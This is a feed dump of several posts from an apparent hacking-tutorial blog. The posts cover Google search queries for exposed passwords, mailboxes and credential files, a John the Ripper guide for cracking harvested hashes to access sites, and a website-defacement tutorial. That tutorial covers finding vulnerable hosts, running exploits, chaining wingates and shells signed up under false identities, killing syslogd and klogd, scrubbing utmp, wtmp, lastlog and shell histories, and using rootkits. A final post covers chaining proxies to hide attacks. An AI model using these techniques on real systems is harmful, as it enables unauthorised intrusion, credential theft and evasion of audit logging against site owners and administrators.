/&gt;&lt;br /&gt;&lt;strong&gt;Searching for Other Juicy Info&lt;/strong&gt;&lt;br /&gt;As we’ve seen, Google can be used to locate all sorts of sensitive information. In this section we take a look at some of the data that Google can find that’s harder to categorize. 
From address books to chat log files and network vulnerability&lt;br /&gt;reports, there’s no shortage of sensitive data online.Table 9.5 shows some queries&lt;br /&gt;that can be used to uncover various types of sensitive data.&lt;br /&gt;Query Description&lt;br /&gt;intext:”Session Start AIM and IRC log files&lt;br /&gt;* * * *:*:* *” filetype:log&lt;br /&gt;filetype:blt blt +intext: AIM buddy lists&lt;br /&gt;screenname&lt;br /&gt;buddylist.blt AIM buddy lists&lt;br /&gt;intitle:index.of cgiirc.config CGIIRC (Web-based IRC client) config file,&lt;br /&gt;shows IRC servers and user credentials&lt;br /&gt;inurl:cgiirc.config CGIIRC (Web-based IRC client) config file,&lt;br /&gt;shows IRC servers and user credentials&lt;br /&gt;“Index of” / “chat/logs” Chat logs&lt;br /&gt;intitle:”Index Of” cookies.txt cookies.txt file reveals user information&lt;br /&gt;“size”&lt;br /&gt;“phone * * *” “address *” Curriculum vitae (resumes) reveal names&lt;br /&gt;“e-mail” intitle:”curriculum vitae” and address information&lt;br /&gt;ext:ini intext:env.ini Generic environment data&lt;br /&gt;intitle:index.of inbox Generic mailbox files&lt;br /&gt;“Running in Child mode” Gnutella client data and statistics&lt;br /&gt;“:8080” “:3128” “:80” HTTP Proxy lists&lt;br /&gt;filetype:txt&lt;br /&gt;intitle:”Index of” ICQ chat logs&lt;br /&gt;dbconvert.exe chats&lt;br /&gt;“sets mode: +p” IRC private channel information&lt;br /&gt;“sets mode: +s” IRC secret channel information&lt;br /&gt;“Host Vulnerability Summary ISS vulnerability scanner reports, reveal&lt;br /&gt;Report” potential vulnerabilities on hosts and&lt;br /&gt;networks&lt;br /&gt;“Network Vulnerability ISS vulnerability scanner reports, reveal&lt;br /&gt;Assessment Report” potential vulnerabilities on hosts and networks&lt;br /&gt;filetype:pot inurl:john.pot John the Ripper password cracker results&lt;br /&gt;intitle:”Index Of” -inurl:maillog Maillog files reveals e-mail traffic&lt;br /&gt;maillog size information&lt;br 
/&gt;ext:mdb inurl:*.mdb inurl: Microsoft FrontPage database folders&lt;br /&gt;Query Description&lt;br /&gt;filetype:xls inurl:contact Microsoft Excel sheets containing contact&lt;br /&gt;information.&lt;br /&gt;intitle:index.of haccess.ctl Microsoft FrontPage equivalent(?)of htaccess&lt;br /&gt;shows Web authentication info&lt;br /&gt;ext:log “Software: Microsoft Microsoft Internet Information Services&lt;br /&gt;Internet Information Services *.*” (IIS) log files&lt;br /&gt;filetype:pst inurl:”outlook.pst” Microsoft Outlook e-mail and calendar&lt;br /&gt;backup files&lt;br /&gt;intitle:index.of mt-db-pass.cgi Movable Type default file&lt;br /&gt;filetype:ctt ctt messenger MSN Messenger contact lists&lt;br /&gt;“This file was generated Nessus vulnerability scanner reports, reveal&lt;br /&gt;by Nessus” potential vulnerabilities on hosts and networks&lt;br /&gt;inurl:”newsletter/admin/” Newsletter administration information&lt;br /&gt;inurl:”newsletter/admin/” Newsletter administration information&lt;br /&gt;intitle:”newsletter admin”&lt;br /&gt;filetype:eml eml intext: Outlook Express e-mail files&lt;br /&gt;”Subject” +From&lt;br /&gt;intitle:index.of inbox dbx Outlook Express Mailbox files&lt;br /&gt;intitle:index.of inbox dbx Outlook Express Mailbox files&lt;br /&gt;filetype:mbx mbx intext:Subject Outlook v1–v4 or Eudora mailbox files&lt;br /&gt;inurl:/public/?Cmd=contents Outlook Web Access public folders or&lt;br /&gt;appointments&lt;br /&gt;filetype:pdb pdb backup (Pilot Palm Pilot Hotsync database files&lt;br /&gt; Pluckerdb)&lt;br /&gt;“This is a Shareaza Node” Shareaza client data and statistics&lt;br /&gt;inurl:/_layouts/settings Sharepoint configuration information&lt;br /&gt;inurl:ssl.conf filetype:conf SSL configuration files, reveal various configuration&lt;br /&gt;information&lt;br /&gt;site:edu admin grades Student grades&lt;br /&gt;intitle:index.of mystuff.xml Trillian user Web links&lt;br /&gt;inurl:forward filetype: UNIX mail forward files reveal 
e-mail&lt;br /&gt;forward –cvs addresses&lt;br /&gt;intitle:index.of dead.letter UNIX unfinished e-mails&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;br /&gt;Make no mistake—there’s sensitive data on the Web, and Google can find it.&lt;br /&gt;There’s hardly any limit to the scope of information that can be located, if only&lt;br /&gt;you can figure out the right query. From usernames to passwords, credit card and&lt;br /&gt;Social Security numbers, and personal financial information, it’s all out there. As a&lt;br /&gt;purveyor of the “dark arts,” you can relish in the stupidity of others, but as a professional&lt;br /&gt;tasked with securing a customer’s site from this dangerous form of&lt;br /&gt;information leakage, you could be overwhelmed by the sheer scale of your&lt;br /&gt;defensive duties.&lt;br /&gt;As droll as it might sound, a solid, enforced security policy is a great way to&lt;br /&gt;keep sensitive data from leaking to the Web. If users understand the risks associated&lt;br /&gt;with information leakage and understand the penalties that come with violating&lt;br /&gt;policy, they will be more willing to cooperate in what should be a security&lt;br /&gt;partnership.&lt;br /&gt;In the meantime, it certainly doesn’t hurt to understand the tactics an adversary&lt;br /&gt;might employ in attacking a Web server. One thing that should become&lt;br /&gt;clear as you read this book is that any attacker has an overwhelming number of&lt;br /&gt;files to go after. One way to prevent dangerous Web information leakage is by&lt;br /&gt;denying requests for unknown file types. 
Whether your Web server normally serves up CFM, ASP, PHP, or HTML, it’s infinitely easier to manage what should be served by the Web server instead of focusing on what should not be served. Adjust your servers or your border protection devices to allow only specific content or file types.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Solutions Fast Track&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Searching for Usernames&lt;/strong&gt;&lt;br /&gt;_ Usernames can be found in a variety of locations.&lt;br /&gt;_ In some cases, digging through documents or e-mail directories might be required.&lt;br /&gt;_ A simple query such as “your username is” can be very effective in locating usernames.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Searching for Passwords&lt;/strong&gt;&lt;br /&gt;_ Passwords can also be found in a variety of locations.&lt;br /&gt;_ A query such as “Your password” forgot can locate pages that provide a forgotten-password recovery mechanism.&lt;br /&gt;_ intext:(password  passcode  pass) intext:(username  userid  user) is another generic search for locating password information.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Searching for Credit Card Numbers, Social Security Numbers, and More&lt;/strong&gt;&lt;br /&gt;_ Documents containing credit card and Social Security number information do exist and are relatively prolific.&lt;br /&gt;_ Some irresponsible news outlets have revealed functional queries that locate this information.&lt;br /&gt;_ There are relatively few examples of personal financial data online, but there is a great deal of variety.&lt;br /&gt;_ In most cases, specific file extensions can be searched for.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Searching for Other Juicy Info&lt;/strong&gt;&lt;br /&gt;_ From address books and chat log files to network vulnerability reports, there’s no shortage of sensitive data online.
</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/439764695528263456/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=439764695528263456' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/439764695528263456'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/439764695528263456'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/hacking-google-for-finding-passwords.html' title='HAcking google for finding passwords and other personal info'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-7616092041906785956</id><published>2007-12-02T01:32:00.001-08:00</published><updated>2007-12-02T01:32:36.351-08:00</updated><title type='text'>John the ripper tutorial</title><content type='html'>inside the file i targeted i found the hashed password like this &lt;br /&gt;&lt;br /&gt;blah:S2XSgk2WEfE9w &lt;br /&gt;&lt;br /&gt;so saved to list ready to crack , i called mine MD5pass for this lesson &lt;br /&gt;&lt;br /&gt;this is what jtr will be cracking, &lt;br /&gt;&lt;br /&gt;after you have several passwords to various sites you can begin jtr or just use a single hashed password ..its up to you &lt;br /&gt;&lt;br /&gt;now there are many ways to crack the file using jtr am just going to use the 
basic &lt;br /&gt;one I find the easiest but slowest to use. There are plenty of JTR guides around for more detailed cracking modes. &lt;br /&gt;&lt;br /&gt;Common modes are: &lt;br /&gt;&lt;br /&gt;john -si [passfile] &lt;br /&gt;&lt;br /&gt;john -w:[wordlist] [passfile] &lt;br /&gt;&lt;br /&gt;john -i [passfile] &lt;br /&gt;&lt;br /&gt;There are other modes using digits, alpha, all... they all do the same thing. Anyway, on to basics. &lt;br /&gt;&lt;br /&gt;Assuming you have john in the C:\ directory, just type &lt;br /&gt;&lt;br /&gt;c:\john -i MD5pass.txt &lt;br /&gt;&lt;br /&gt;image 1 &lt;br /&gt;&lt;br /&gt;After several minutes\hours you should have something like this, with cracked passwords, if you take a look at the image. &lt;br /&gt;&lt;br /&gt;After 21 minutes it had cracked 13 of the 36... not bad. After 3hrs 24min, 18 cracked... half done. BTW, each password cracked is a website... so up to now 18 possible targets. &lt;br /&gt;&lt;br /&gt;image 2 &lt;br /&gt;&lt;br /&gt;To check progress hit any key. &lt;br /&gt;&lt;br /&gt;To stop the cracking hit Ctrl+C (session aborted). &lt;br /&gt;&lt;br /&gt;To view your results type: &lt;br /&gt;&lt;br /&gt;c:\john -show MD5pass.txt&gt;result2.txt &lt;br /&gt;&lt;br /&gt;This will save a file called result2.txt in the JTR root, like this: &lt;br /&gt;&lt;br /&gt;image 3 &lt;br /&gt;&lt;br /&gt;You now have the password to gain access to the FTP, or whatever. &lt;br /&gt;&lt;br /&gt;To resume your cracking, type: &lt;br /&gt;&lt;br /&gt;c:\john -restore &lt;br /&gt;&lt;br /&gt;This will load the remaining uncracked passwords and resume attempts from where it left off. &lt;br /&gt;&lt;br /&gt;image 4 &lt;br /&gt;&lt;br /&gt;JTR Commands and Modes &lt;br /&gt;&lt;br /&gt;**If you look in the doc folder that came with JTR it gives you details on how to use them.** &lt;br /&gt;&lt;br /&gt;Hope you enjoyed 
the tutorial. Remember, if you do gain access to a site\server please inform the admin. &lt;br /&gt;&lt;br /&gt;I hold no responsibility for your actions.</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/7616092041906785956/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=7616092041906785956' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/7616092041906785956'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/7616092041906785956'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/john-ripper-tutorial.html' title='John the ripper tutorial'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-5265896502014181377</id><published>2007-12-02T01:30:00.000-08:00</published><updated>2007-12-02T01:31:02.697-08:00</updated><title type='text'>Steps To Deface A Webpage (About Defacers)</title><content type='html'>First of all, I do not deface, I never have (besides friends' sites as jokes and all in good fun), and never will. So how do I know how to deface? I guess I just picked it up on the way, so I am no expert in this. If I get a thing or two wrong I apologize. 
It is pretty simple when you think that defacing is just replacing a file on a computer. Now, finding the exploit in the first place, that takes skill, that takes knowledge, that is what real hackers are made of. I don't encourage that you deface any sites, as this can be used to get credit cards, passwords, source code, billing info, email databases, etc. (it is only right to put up some kind of warning; now go have fun ;) &lt;br /&gt;&lt;br /&gt;This tutorial will be broken down into 3 main sections, they are as follows: &lt;br /&gt;1. Finding Vuln Hosts &lt;br /&gt;2. Getting In &lt;br /&gt;3. Covering Your Tracks &lt;br /&gt;&lt;br /&gt;It really is easy, and I will show you how easy it is. &lt;br /&gt;&lt;br /&gt;1. Finding Vuln Hosts &lt;br /&gt;This section needs to be further broken down into two categories of script kiddies: ones who scan the net for a host that is vuln to a certain exploit, and ones who search a certain site for any exploit. The ones you see on alldas are the first kind; they scan thousands of sites for a specific exploit. They do not care who they hack, anyone will do. They have no set target and not much of a purpose. In my opinion these people should either have a cause behind what they are doing, i.e. "I make sure people keep up to date with security, I am a messenger" or "I am spreading a political message, I use defacements to get media attention". People who deface to get famous or to show off their skills need to grow up and realize there is a better way of going about this (not that I support the ones with other reasons either). Anyway, the two kinds and what you need to know about them: &lt;br /&gt;&lt;br /&gt;Scanning Script Kiddie: You need to know what the signs of the hole are. Is it a service? A certain OS? A CGI file? How can you tell if they are vuln? What version(s) are vuln? You need to know how to search the net to find targets which are running whatever is vuln. Use altavista.com or google.com for web based exploits. 
Use a script to scan IP ranges for a certain port that runs the vuln service, or use netcraft.com to find out what kind of server they are running and what extras it runs (frontpage, php, etc.). nmap and other port scanners allow quick scans of thousands of IPs for open ports. This is a favorite technique of those guys you see with mass hacks on alldas. &lt;br /&gt;&lt;br /&gt;Targeted Site Script Kiddie: More respectable than the script kiddies who hack any old site. The main step here is gathering as much information about a site as possible. Find out what OS they run at netcraft or by using: telnet www.site.com 80 then GET / HTTP/1.1. Find out what services they run by doing a port scan. Find out the specifics on the services by telnetting to them. Find any CGI script, or other files which could allow access to the server if exploited, by checking /cgi and /cgi-bin and browsing around the site (remember to index browse). &lt;br /&gt;&lt;br /&gt;Wasn't so hard to get the info, was it? It may take a while, but go through the site slowly and get all the information you can. &lt;br /&gt;&lt;br /&gt;2. Getting In &lt;br /&gt;Now that we've got the info on the site we can find the exploit(s) we can use to get access. If you were a scanning script kiddie you would know the exploit ahead of time. A couple of great places to look for exploits are Security Focus and packetstorm. Once you get the exploit, check and make sure that the exploit is for the same version as the service, OS, script, etc. Exploits mainly come in two languages; the most used are C and perl. Perl scripts will end in .pl or .cgi, while C will end in .c. To compile a C file (on *nix systems) do gcc -o exploit12 file.c then: ./exploit12. For perl just do: chmod 700 file.pl (not really needed) then: perl file.pl. If it is not a script it might be a very simple exploit, or just a theory of a possible exploit. Just do a little research into how to use it. 
Another thing you need to check is whether the exploit is remote or local. If it is local you must have an account or physical access to the computer. If it is remote you can do it over a network (internet). &lt;br /&gt;&lt;br /&gt;Don't go compiling exploits just yet, there is one more important thing you need to know. &lt;br /&gt;&lt;br /&gt;3. Covering Your Tracks &lt;br /&gt;So by now you have gotten the info on the host in order to find an exploit that will allow you to get access. So why not do it? The problem with covering your tracks isn't that it is hard, rather that it is unpredictable. Just because you killed the sys logging doesn't mean that they don't have another logger or IDS running somewhere else (even on another box). Since most script kiddies don't know the skill of the admin they are targeting, they have no way of knowing if they have additional loggers or what. Instead the script kiddie makes it very hard (next to impossible) for the admin to track them down. Many use a stolen or second ISP account to begin with, so even if they get tracked they won't get caught. If you don't have the luxury of this then you MUST use multiple wingates, shell accounts, or trojans to bounce off of. Linking them together will make it very hard for someone to track you down. Logs on the wingates and shells will most likely be erased after like 2-7 days. That is if logs are kept at all. It is hard enough to even get ahold of one admin in a week, let alone further tracking the script kiddie down to the next wingate or shell and then getting ahold of that admin, all before the logs of any are erased. And it is rare for an admin to even notice an attack; an even smaller percentage will actively pursue the attacker at all, and will just secure their box and forget it ever happened. 
For the sake of argument let's just say if you use wingates and shells, don't do anything to piss the admin off too much (which will get them to call the authorities or try to track you down), and you delete logs, you will be safe. So how do you do it? &lt;br /&gt;&lt;br /&gt;We will keep this very short and to the point, so we'll need to get a few wingates. Wingates by nature tend to change IPs or shut down all the time, so you need an updated list or a program to scan the net for them. You can get a list of wingates that is well updated at http://www.cyberarmy.com/lists/wingate/ and you can also get a program called winscan there. Now let's say we have 3 wingates: &lt;br /&gt;&lt;br /&gt;212.96.195.33 port 23 &lt;br /&gt;202.134.244.215 port 1080 &lt;br /&gt;203.87.131.9 port 23 &lt;br /&gt;&lt;br /&gt;To use them we go to telnet and connect to them on port 23. We should get a response like this: &lt;br /&gt;&lt;br /&gt;CSM Proxy Server &gt; &lt;br /&gt;&lt;br /&gt;To connect to the next wingate we just type in its ip:port &lt;br /&gt;&lt;br /&gt;CSM Proxy Server &gt;202.134.244.215:1080 &lt;br /&gt;&lt;br /&gt;If you get an error it is most likely that the proxy you are trying to connect to isn't up, or that you need to log in to the proxy. If all goes well you will get the 3 chained together and have a shell account you are able to connect to. Once you are in your shell account you can link shells together by: &lt;br /&gt;&lt;br /&gt;[j00@server j00]$ ssh 212.23.53.74 &lt;br /&gt;&lt;br /&gt;You can get free shells to work with until you get some hacked shells; here is a list of free shell accounts. And please remember to sign up with false information and from a wingate if possible. 
&lt;br /&gt;&lt;br /&gt;Once you get on your last shell you can compile the exploit, and you should be safe from being tracked. But let's be even more sure and delete the evidence that we were there. &lt;br /&gt;&lt;br /&gt;Alright, there are a few things on the server side that all script kiddies need to be aware of. Mostly these are logs that you must delete or edit. The real script kiddies might even use a rootkit to automatically delete the logs, although let's assume you aren't that lame. There are two main logging daemons which I will cover: klogd, which is the kernel logs, and syslogd, which is the system logs. The first step is to kill the daemons so they don't log any more of your actions. 
&lt;br /&gt;&lt;br /&gt;[root@hacked root]# ps -def | grep syslogd &lt;br /&gt;[root@hacked root]# kill -9 pid_of_syslogd &lt;br /&gt;&lt;br /&gt;In the first line we are finding the pid of syslogd; in the second we are killing the daemon. You can also use /etc/syslog.pid to find the pid of syslogd. &lt;br /&gt;&lt;br /&gt;[root@hacked root]# ps -def | grep klogd &lt;br /&gt;[root@hacked root]# kill -9 pid_of_klogd &lt;br /&gt;&lt;br /&gt;Same thing happening here with klogd as we did with syslogd. &lt;br /&gt;&lt;br /&gt;Now that we've killed the default loggers, the script kiddie needs to delete themselves from the logs. To find where syslogd puts its logs check the /etc/syslog.conf file. Of course if you don't care if the admin knows you were there you can delete the logs completely. Let's say you are the lamest of the script kiddies, a defacer; the admin would know that the box has been compromised since the website was defaced. So there is no point in appending the logs, they would just delete them. The reason we are appending them is so that the admin will not even know a break-in has occurred. I'll go over the main reasons people break into a box: &lt;br /&gt;&lt;br /&gt;To deface the website. - This is really lame, since it has no point and just damages the system. &lt;br /&gt;&lt;br /&gt;To sniff for other network passwords. - There are programs which allow you to sniff other passwords sent from and to the box. If this box is on an ethernet network then you can even sniff packets (which contain passwords) that are destined to any box in that segment. &lt;br /&gt;&lt;br /&gt;To mount a DDoS attack. - Another lame reason; the admin has a high chance of noticing that you compromised him once you start sending hundreds of MBs through his connection. &lt;br /&gt;&lt;br /&gt;To mount another attack on a box. - This and sniffing are the most commonly used, not lame, reasons for exploiting something. 
Since you now have a root shell you can mount your attack from this box instead of those crappy freeshells. And you now have control over the logging of the shell. &lt;br /&gt;&lt;br /&gt;To get sensitive info. - Some corporate boxes have a lot of valuable info on them. Credit card databases, source code for software, user/password lists, and other top secret info that a hacker may want to have. &lt;br /&gt;&lt;br /&gt;To learn and have fun. - Many people do it for the thrill of hacking, and the knowledge you gain. I don't see this as being as horrible a crime as defacing; as long as you don't destroy anything I don't think this is very bad. In fact some people will even help the admin patch the hole. Still illegal though, and best not to break into anyone's box. &lt;br /&gt;&lt;br /&gt;I'll go over the basic log files: utmp, wtmp, lastlog, and .bash_history. &lt;br /&gt;These files are usually in /var/log/ but I have heard of them being in /etc/, /usr/bin/ and other places. Since it is different on a lot of boxes it is best to just do a find / -iname 'utmp'; find / -iname 'wtmp'; find / -iname 'lastlog' and also search through the /usr/, /var/ and /etc/ directories for other logs. Now for the explanation of these files. &lt;br /&gt;&lt;br /&gt;utmp is the log file for who is on the system; I think you can see why this log should be appended, because you do not want to let anyone know you are in the system. wtmp logs the logins and logouts as well as other info you want to keep away from the admin. It should be appended to show that you never logged in or out. And lastlog is a file which keeps records of all logins. Your shell's history is another file that keeps a log of all the commands you issued; you should look for it in your $HOME directory and edit it. .sh_history, .history, and .bash_history are the common names. You should only append these log files, not delete them. 
If you delete them it will be like holding a big sign in front of the admin saying "You've been hacked". Newbie script kiddies often deface and then rm -rf / to be safe. I would avoid this unless you are really freaking out; in that case I would suggest that you never try to exploit a box again. Another way to find log files is to run a script to check for open files (and then manually look at them to determine if they are logs) or do a find for files which have been edited; this command would be: find / -ctime 0 -print &lt;br /&gt;&lt;br /&gt;A few popular scripts which can hide your presence from logs include: zap, clear and cloak. Zap will replace your presence in the logs with 0's, clear will clear the logs of your presence, and cloak will replace your presence with different information. acct-cleaner is the only heavily used script for deleting account logging, from my experience. Most rootkits have a log cleaning script, and once you have installed it logs are not kept of you anyway. If you are on NT the logs are at C:\winNT\system32\LogFiles\; just delete them, NT admins most likely don't check them or don't know what it means if they are deleted. &lt;br /&gt;&lt;br /&gt;One final thing about covering your tracks; I won't go too far into detail about this because it would require a tutorial all to itself. I am talking about rootkits. What are rootkits? They are a very widely used tool to cover your tracks once you get into a box. They will make staying hidden pain-free and very easy. What they do is replace binaries like login, ps, and who so that they never show your presence. They will allow you to log in without a password, without being logged by wtmp or lastlog, and without even being in the /etc/passwd file. They also make commands like ps not show your processes, so no one knows what programs you are running. They send out fake reports on netstat, ls, and w so that everything looks the way it normally would, except anything you do is missing. 
But there are some flaws in rootkits; for one, some commands produce strange effects because the binary was not made correctly. They also leave fingerprints (ways to tell that the file is from a rootkit). Only smart/good admins check for rootkits, so this isn't the biggest threat, but it should be considered. Rootkits that come with a LKM (loadable kernel module) are usually the best as they can pretty much make you totally invisible to all others, and most admins wouldn't be able to tell they were compromised. &lt;br /&gt;&lt;br /&gt;In writing this tutorial I have mixed feelings. I do not want more script kiddies out there scanning hundreds of sites for the next exploit. And I don't want my name on any shouts. I would rather have people say "mmm, that defacing crap is pretty lame", especially when people with no lives scan for exploits every day just to get their name on a site for a few minutes. I feel a lot of people are learning everything but what they need to know in order to break into boxes. Maybe this tutorial cut to the chase a little and helps people with some knowledge see how simple it is, and hopefully makes them see that getting into a system is not all it's hyped up to be. It is not by any means a full guide; I did not cover a lot of things. I hope admins found this tutorial helpful as well, learning that no matter what site you run you should always keep on top of the latest exploits and patch them. Protect yourself with IDS and try finding holes on your own system (both with vuln scanners and by hand). Also, setting up an external box to log to is not a bad idea. Admins should have also seen a little bit into the mind of a script kiddie and learned a few things he does; this should help you catch one if they break into your systems. &lt;br /&gt;&lt;br /&gt;On one final note, defacing is lame. I know many people who have defaced in the past and regret it now. 
You will be labeled a script kiddie and a lamer for a long, long time.</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/5265896502014181377/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=5265896502014181377' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/5265896502014181377'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/5265896502014181377'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/steps-to-deface-webpage-about-defacers.html' title='Steps To Deface A Webpage (About Defacers)'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-7073355113603413578</id><published>2007-12-02T01:28:00.000-08:00</published><updated>2007-12-02T01:29:24.959-08:00</updated><title type='text'>Hacking Techniques: Issue #2 - Bouncing Attacks</title><content type='html'>1. Getting info &lt;br /&gt;  -vuln scripts &lt;br /&gt;  -vuln services &lt;br /&gt;  -vuln people &lt;br /&gt;&lt;br /&gt;1.99 Intro &lt;br /&gt;&lt;br /&gt;2. 
Bouncing Attacks &lt;br /&gt;  -proxies &lt;br /&gt;  -wingates &lt;br /&gt;  -shells &lt;br /&gt;&lt;br /&gt;2.5 Conclusion &lt;br /&gt;&lt;br /&gt;(covered in future issue) &lt;br /&gt;&lt;br /&gt;3. Once They Are In &lt;br /&gt;  -logs &lt;br /&gt;  -IDS &lt;br /&gt;  -Rootkits &lt;br /&gt;  -sniffers &lt;br /&gt;  -DDoS &lt;br /&gt;  -RootShell &lt;br /&gt;  -Deface &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Intro &lt;br /&gt;Welcome to the 2nd issue of Hacking Techniques.  If you read the first one I am glad to see you liked it enough to want to read this one.  This issue will focus on how hackers bounce their attacks so that they do not get caught, and so they can use the power of a *nix shell.  As with the first one, this tutorial can be used by both hackers and admins.  Hackers will learn how to mount an attack and use proxies to help stay anonymous.  Admins will learn how to prevent themselves from being used in an attack as a proxy and prevent stress.  If you don't know what a proxy is or how to use a wingate you need to read this tutorial.  People who run wingates, proxies, or give shells out should also go over this tutorial, as it may scare them into securing them.  I'll go over a few other random things such as using routers as wingates, and using wingates to bounce your irc sessions. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bouncing Attacks &lt;br /&gt;There are a few ways to bounce your attack.  Sometimes it depends on how you are going to do the attack, sometimes it depends on what you've got on hand.  I will introduce you to 3 ways to bounce your attack.  I will not go into using routers as proxies since wingates are fairly easy to get.  And I will not go over bouncing your attack off an ftp because all (or very close to all) ftp programs are patched against this by now. Not only should hackers read this next part, but so should admins who want to keep themselves from being used in an attack.  
Securing their proxies and wingates can help prevent trouble with hackers abusing them. This can save some time and hassle because you will not need to bother with an admin who is trying to track down a hacker who used your network to bounce off of. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bouncing through proxies &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bouncing through wingates &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bouncing and compiling the attack with shells &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bouncing through proxies &lt;br /&gt;Proxies are the most basic way to stay anonymous while on the web.  They are used with your web browser to relay data that you are downloading.  So when you send a request to get a webpage it is first sent to the proxy and then to the website, like this: &lt;br /&gt;&lt;br /&gt;    [your computer] -&gt; [proxy] -&gt; [website] &lt;br /&gt;&lt;br /&gt;Some kinds of proxies, known as caching proxies, will hold local copies of websites people visit.  This makes browsing much faster since ideally the connection between you and the proxy is very fast.  So instead of having to query the website the proxy will just send out the saved (cached) copy and save time and resources.  Although this can be a problem, as I have had first hand experience with this.  When running lame industries we put a script up that allowed people to check out other users' email addresses, image, website, names, country, etc.; all info was optional.  But the script would check if you were an admin of lame industries and if you were it would display users' passwords and cookies, and allow you to change the status of users.  Now somehow a nice fellow named MaAaX found a caching proxy that had this page cached.  Not only was it cached, but it was the admin version that was cached.  Some admin of the site must have used that proxy to visit that script, so the proxy saved what he saw.  And MaAaX reported this, but he was tricked into reporting it to someone who was not an admin of the site.  
That person then used the proxy to get an admin's password from the cached page.  Moral of the story? Don't leave sensitive info out for everyone to see. I would suggest not using a proxy when administering a site through http, and also putting all scripts which can be used by an admin in a .htaccess protected directory. &lt;br /&gt;&lt;br /&gt;Proxies are very easy to find and very easy to use.  To find them try using a program called Proxy Hunter; what this program will do is scan large ranges of IPs for open proxies.  Then it will report them to you so you can try them and see if they require a username and password or if you can use them without.  Another way is to look on the web for lists of proxies; a few good sites for this are: &lt;br /&gt;&lt;br /&gt;cyberarmy's proxy list &lt;br /&gt;&lt;br /&gt;roswell's proxy list &lt;br /&gt;&lt;br /&gt;Don't expect proxies to stay up forever; if one goes down try another.  It is fairly simple to set up basic security for your proxy server: get a good access list restricting who can use it.  Also, as with all programs, check for known security vulnerabilities in the proxy server itself, and vulnerabilities in your firewall, where you set the access list for the proxy server. &lt;br /&gt;&lt;br /&gt;To use proxies you need to set up your browser to bounce off of them.  In Internet Explorer this is done by going to Tools-&gt;Internet Options...-&gt;Connections-&gt;(highlighting your connection)-&gt;Settings...-&gt;check "Use a proxy server for this connection"-&gt;fill in the IP or hostname and the port number, then press OK, and OK. &lt;br /&gt;&lt;br /&gt;To set up Netscape to use a proxy select Edit-&gt;Preferences-&gt;Advanced-&gt;Proxies-&gt;"Manual proxy configuration" then fill in the hostname or IP and the port number. 
&lt;br /&gt;&lt;br /&gt;In lynx (or Mosaic) you would do this at the command line: &lt;br /&gt;&lt;br /&gt;http_proxy="http://proxy.com:80/"; export http_proxy; exec lynx &lt;br /&gt;&lt;br /&gt;or exec Mosaic. &lt;br /&gt;&lt;br /&gt;Now to validate that the proxy is working, go to a site which displays server environment variables from a perl/php script. One such site is http://www.cyberarmy.com/cgi/whoami.pl &lt;br /&gt;&lt;br /&gt;One proxy is good for everyday surfing, but what if you are up to a little more than just that?  (I see that smile on your face.)  You need to use a technique called chaining proxies.  What happens is you relay the data transfer from one proxy, to another, to another, to another ... until it reaches the destination.  It is fairly simple to do this, but some proxies don't support it.  Other problems include: if one proxy is slow it makes the connection time out, too many proxies make the connection time out, and it takes a while to find 4 or 5 good proxies.  This should work in almost every browser; put the proxies in the address bar in this format: http://proxy.com:80/http://proxy2.com:80/http://proxy3.com:8000/http://site.com This should connect you to site.com using those 3 proxies and the one you put in your configuration (options, preferences... what we just did above).  I've also heard that using http://proxy.com;80-_-http://site.com works, but from my experience it tends to be less supported by proxy servers. &lt;br /&gt;&lt;br /&gt;Now when I say proxies can be used to bounce a connection to a webpage, I mean webpage.  You cannot use a normal http proxy on anything besides port 80 (the http port, for webpages).  If you want to bounce connections on other ports try a wingate. &lt;br /&gt;&lt;br 